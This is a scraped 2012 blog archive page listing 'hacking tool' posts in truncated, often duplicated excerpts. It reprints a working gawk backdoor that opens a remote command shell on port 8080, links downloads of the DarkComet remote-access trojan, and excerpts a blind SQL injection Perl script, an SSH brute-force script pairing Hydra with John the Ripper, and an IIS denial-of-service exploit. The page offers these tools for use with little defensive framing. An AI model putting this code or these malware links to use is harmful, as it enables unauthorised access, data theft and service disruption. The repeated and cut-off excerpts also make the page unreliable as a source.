Showing posts with label hacking tool. Show all posts
Showing posts with label hacking tool. Show all posts
Thursday, 19 July 2012
Friday, 13 July 2012
MultiObfuscator 2.00
Please download this app. from Source.
MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.
Source: http://packetstormsecurity.org/files/114693
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.
Source: http://packetstormsecurity.org/files/114693
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00
Thursday, 12 July 2012
A Backdoor in gawk by thegrugg
BEGIN {
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
port = 8080
prompt = "bkd> "
service = "/inet/tcp/" port "/0/0"
while(1){
do {
printf prompt |& service
service |& getline cmd
if(cmd) {
while((cmd |& getline) > 0)
print $0 |& service
close(cmd)
}
}
Wednesday, 11 July 2012
Hacked Joomla! v. [1.6.x] [1.7.x] [2.5.0-2.5.2] - Escalation of Privileges
This vulnerability allows us to escalate privileges joomla for registering a new user, for 1.6.x/1.7.x versions have not been issued so far no patch versions and 1.0.x/1.5.x/2.5.3 + are not vulnerable. but for our comfort the v. 1.5.x (which is not patched) joomla has the well-known bug of the token, you can change the admin pass, well that's another topic.
Let us focus on our own and
Saturday, 7 July 2012
DarkComet RAT Analyser and Link Download Of DarkComet 5.3.1
This download is the last version of DarkComet RAT 'cause DarkcoderSc (Jean-Pierre LESUEUR) announce he will end developing DarkComet RAT(you can get his announcement here.)
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
Monday, 2 July 2012
Interesting exploit, Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service
If you want to see the exploit code, please go to the Source.
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core
# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core
Using beef plugin with Metasploit
1. Run the beef service
$/pentest/web/beef/beef -x -v
2. In another console, Run the Metasploit Console
$msfconsole
3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git
4. Move file beef.rb to msf/plugins and lib/beef to msf/lib
5. Install hpricot gem
$gem install hpricot
6. In the Metasploit console,
$/pentest/web/beef/beef -x -v
2. In another console, Run the Metasploit Console
$msfconsole
3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git
4. Move file beef.rb to msf/plugins and lib/beef to msf/lib
5. Install hpricot gem
$gem install hpricot
6. In the Metasploit console,
Monday, 25 June 2012
finddomains - discovering domain names/web sites/virtual hosts
FindDomains is a multithreaded search engine discovery tool that will be very useful for penetration testers dealing with discovering domain names/web sites/virtual hosts which are located on too many IP addresses. Provides a console interface so you can easily integrate this tool to your pentest automation system.It retrieves domain names/web sites which are located on specified ip address/
BoNeSi - the DDoS Botnet Simulator
If you want to see demo video of this tool, please go to the Source.
BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly
BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly
Monday, 18 June 2012
PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS
If you want to see a chart, please go to the Source.
Vulnerable Web Applications [36 unique web applications]OWASP BWA http://code.google.com/p/owaspbwa/OWASP Hackademic http://hackademic1.teilar.gr/Butterfly Security Project http://thebutterflytmp.sourceforge.net/Foundstone Hackme Bank http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspxFoundstone Hackme Books http
Vulnerable Web Applications [36 unique web applications]OWASP BWA http://code.google.com/p/owaspbwa/OWASP Hackademic http://hackademic1.teilar.gr/Butterfly Security Project http://thebutterflytmp.sourceforge.net/Foundstone Hackme Bank http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspxFoundstone Hackme Books http
Thursday, 14 June 2012
escanner Escalation Pentesting Tool
escanner is a small tool that helps you thread scan file(s)/directories recursively for possible vulnerability of insecure file permissions that could result on local privilege escalation due to some misconfiguration of operating systen, software vendors or by users. One example, a local attacker can replace/overwrite the original file to a malicious binary that could perform unauthorized actions
Sunday, 10 June 2012
Escaping Restricted Linux Shells
If you want to see all of this article, please go to the Source.
ReconnaissanceThe first step should be to gather a little information. You'll need to know your environment. Run the 'env' command to understand how your profile is configured. You'll see which shell you're running and where your PATH is pointing to. Once you know what your PATH is, list the contents of the directory (i.e. 'ls /
iCrack Online/Offline MD5 Cracker [Python Script]
Cool scripts written in python , iCrack is an Online/ofline md5 cracker script in Python. Currently containes about 14 db for online cracking.
Download Link:: https://code.google.com/p/lnxg33k/downloads/detail?name=icrack.py
Source: http://tools.thehackernews.com/2012/06/icrack-python-md5-online-offline.html
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00
Download Link:: https://code.google.com/p/lnxg33k/downloads/detail?name=icrack.py
Source: http://tools.thehackernews.com/2012/06/icrack-python-md5-online-offline.html
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar $2.00
Wednesday, 6 June 2012
Your LinkedIn password is in the news or not?
Last night, the password(SHA1) of LinkedIn was leaked and if you want to know your password is in the list or not, try this script(from Phobos Technology) for check it.
if you want to see full details of this news, please go to the Source.
1. Download Password from
http://wordpress.phobostechnology.com/wp-content/uploads/2012/06/combo_not.zip
2. Run this python script.
"""
Save this file as
if you want to see full details of this news, please go to the Source.
1. Download Password from
http://wordpress.phobostechnology.com/wp-content/uploads/2012/06/combo_not.zip
2. Run this python script.
"""
Save this file as
Monday, 4 June 2012
Perl script for SQL Injection By c4rp3nt3r@0x50sec.org
#!/usr/bin/perl # blind sqlinjector [GET Method] # for educational purpose only! # by c4rp3nt3r@0x50sec.org use POSIX; use LWP::UserAgent; ######################### 配置信息 开始 ################################# $target ="http://www.0x50sec.org/index.php?p=1'"; # 注射url 字符型注射要在后面加' 并设置闭合注释#!!! $turestr='c4rp3nt3r.jpg'; #!!! 正确页面字符 需要修改
Friday, 1 June 2012
Simple Web Content Management System SQL Injection
If you want all vulnerability of this post, please go to the Source.
####################################################################################### Exploit Title: Simple Web Content Management System SQL Injection# Date: May 30th 2012# Author: loneferret# Version: 1.1# Application Url: http://www.cms-center.com/# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23############
####################################################################################### Exploit Title: Simple Web Content Management System SQL Injection# Date: May 30th 2012# Author: loneferret# Version: 1.1# Application Url: http://www.cms-center.com/# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23############
Thursday, 31 May 2012
Metasploit 4 on iPhone 4S & iPad 2
# Install basic toolsapt-get update apt-get dist-upgrade apt-get install wget subversion# Download correct version of ruby and dependencies wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.debwget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.debwget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb# Install them dpkg -i iconv_1.14-1_iphoneos-arm.debdpkg
Tuesday, 29 May 2012
SSLsplit – transparent and scalable SSL/TLS interception
SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted
network connections. Connections are transparently intercepted through a
network address translation engine and redirected to SSLsplit. SSLsplit
terminates SSL/TLS and initiates a new SSL/TLS connection to the original
destination address, while logging all data transmitted
network connections. Connections are transparently intercepted through a
network address translation engine and redirected to SSLsplit. SSLsplit
terminates SSL/TLS and initiates a new SSL/TLS connection to the original
destination address, while logging all data transmitted
SQLCake - an automatic sql injection exploitation kit
What is sqlcake?
sqlcake is an automatic SQL injection exploitation kit written in Ruby. It's designed for system administration and penetration testing.
sqlcake offers a few useful functions to gather database information easily by sql injection usage.
sqlcake also allows you to bypass magic quotes, dump tables and columns
and gives you the possibility to run an interactive MySQL shell.
sqlcake
sqlcake is an automatic SQL injection exploitation kit written in Ruby. It's designed for system administration and penetration testing.
sqlcake offers a few useful functions to gather database information easily by sql injection usage.
sqlcake also allows you to bypass magic quotes, dump tables and columns
and gives you the possibility to run an interactive MySQL shell.
sqlcake
Sunday, 27 May 2012
THC-Hydra password bruteforcing with john the ripper - http://funoverip.net
#!/bin/shhydra="/usr/local/bin/hydra"john="/usr/bin/john"hydra_module="ssh2"hydra_host="127.0.0.1"hydra_port="22"hydra_nb_task="10"hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "john_sessionfile="$1"john_all_params="--incremental:Alpha --stdout"john_time_step=20 # time (seconds) to run johntmp_passwd="/tmp/pwd1234.tmp"hydra_logfile="/tmp/hydralog"if [ "$1" = "" ];then echo "
Subscribe to:
Posts (Atom)